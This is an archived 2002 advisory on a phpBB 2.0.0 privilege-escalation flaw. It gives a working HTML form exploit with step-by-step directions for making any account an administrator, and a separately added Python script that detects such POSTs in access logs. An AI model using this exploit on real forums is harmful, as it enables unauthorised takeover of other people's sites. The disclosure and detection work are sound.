Privilege Escalation Vulnerability In phpBB 2.0.0

From: nick84at_private
Date: Sun Oct 27 2002 - 15:09:04 PST

    Privilege Escalation Vulnerability In phpBB 2.0.0
    -------------------------------------------------
    
    Rootsecure.net recently found a privilege escalation vulnerability 
    in "phpBB 2.0.0" which allows any person with a "user" level account to 
    escalate their privileges to "administrator" level, and therefore 
    gain full, unrestricted control of a forum.
    
    A coding error exists in the admin_ug_auth.php script (used to set 
    permissions): admin rights are checked when the page is viewed, but 
    not when data is posted back to it, so anyone can submit to it "no 
    questions asked".  Therefore, if you already know what kind of response 
    the board is looking for, you can go straight ahead and tell it directly 
    that you want to give admin rights to a specific account.
    
    Demonstration Code
    ------------------
    
    <html>
    <head>
    </head>
    <body>
    
    <form method="post" 
    action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
    User Level: <select name="userlevel">
    <option value="admin">Administrator</option>
    <option value="user">User</option></select>
    <input type="hidden" name="private[1]" value="0">
    <input type="hidden" name="moderator[1]" value="0">
    <input type="hidden" name="mode" value="user">
    <input type="hidden" name="adv" value="">
    User Number: <input type="text" name="u" size="5">
    <input type="submit" name="submit" value="Submit">
    
    </form>
    </body>
    </html>
    
    Before using the sample code you must first find out two bits of 
    information:
    
    1. The base directory of the board, (usually something like 
    http://www.mydomain.com/phpBB2), which is found by taking off index.php 
    from the main page URL.
    2. The user number of the account you wish to give admin rights to.  To 
    do this, go to the forum's member list page, click your username, then 
    note down the number shown at the right end of the URL you are now at.  
    (If no users have been deleted from the board, then the number next to 
    your username on the member list page under the "#" column will also be 
    your true user number.)
    
    When you have all the information, ensure you log out from the board 
    (otherwise, you will get a permissions error later on).
    
    Now edit the form action in the demonstration code above to be the full 
    location of the board's base directory plus the location of the admin 
    script.  Usually, this is in a subdirectory of the base directory 
    called /admin/.  Your result should look something like this: 
    action=http://www.domain_name/board_directory/admin/admin_ug_auth.php.  
    Save the changes to your page when you are done.  
    
    Next just call it in a local browser window, typing the user number you 
    obtained into the user number box on screen, and hit submit.  On your 
    next login, you will have admin rights.
    
    Note: phpBB versions above 2.0.0 are not vulnerable.
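    One way a board operator could spot the submissions described above in 
    web-server access logs, as an added example that is not part of this 
    advisory or of phpBB: a form loaded from a local file or a foreign page 
    arrives with an empty or off-host Referer, so a POST to the permissions 
    script without a Referer on the board's own host is worth an alert.  The 
    combined log format, the host name and the sample lines are assumptions.

```python
import re
from urllib.parse import urlparse

# Apache/nginx "combined" log format (assumed; adjust the pattern to your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The permissions script named in the advisory.
ADMIN_SCRIPT = "/admin/admin_ug_auth.php"


def is_suspicious(entry, board_host):
    """True for a POST to the permissions script whose Referer is empty or
    points to a different host than the board itself.  A legitimate admin
    submits the form from the admin panel, so the Referer is on board_host."""
    if entry["method"] != "POST" or not entry["path"].endswith(ADMIN_SCRIPT):
        return False
    ref = entry["referer"]
    if ref in ("", "-"):
        return True
    return urlparse(ref).hostname != board_host


def find_suspicious_posts(lines, board_host):
    """Return (ip, timestamp, referer) for every flagged log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than crash the scan
        e = m.groupdict()
        if is_suspicious(e, board_host):
            hits.append((e["ip"], e["ts"], e["referer"]))
    return hits


# Constructed sample entries (hypothetical host "forum.example.test", not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Oct/2002:15:00:01 -0800] "GET /phpBB2/admin/admin_ug_auth.php HTTP/1.0" 200 2048 "http://forum.example.test/phpBB2/admin/index.php" "Mozilla/4.0"',
    '192.0.2.10 - - [27/Oct/2002:15:00:09 -0800] "POST /phpBB2/admin/admin_ug_auth.php HTTP/1.0" 200 512 "http://forum.example.test/phpBB2/admin/admin_ug_auth.php?mode=user" "Mozilla/4.0"',
    '198.51.100.7 - - [27/Oct/2002:15:09:04 -0800] "POST /phpBB2/admin/admin_ug_auth.php HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.8 - - [27/Oct/2002:15:10:30 -0800] "POST /phpBB2/admin/admin_ug_auth.php HTTP/1.0" 200 512 "http://elsewhere.example.test/form.html" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, ts, ref in find_suspicious_posts(SAMPLE_LOG, "forum.example.test"):
        print(f"suspicious POST from {ip} at {ts} (referer: {ref})")
```

    The Referer is a heuristic only (browsers and proxies may strip it), so 
    treat a hit as a prompt to check that account's permissions, not as proof.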
    
    Additional information along with downloadable versions of the exploit 
    code in the form of a static HTML page, and Perl script can be found at 
    http://www.rootsecure.net?menuitem=exploit_code
    
    ______________________________
    http://www.rootsecure.net/
    



    This archive was generated by hypermail 2b30 : Mon Oct 28 2002 - 15:05:36 PST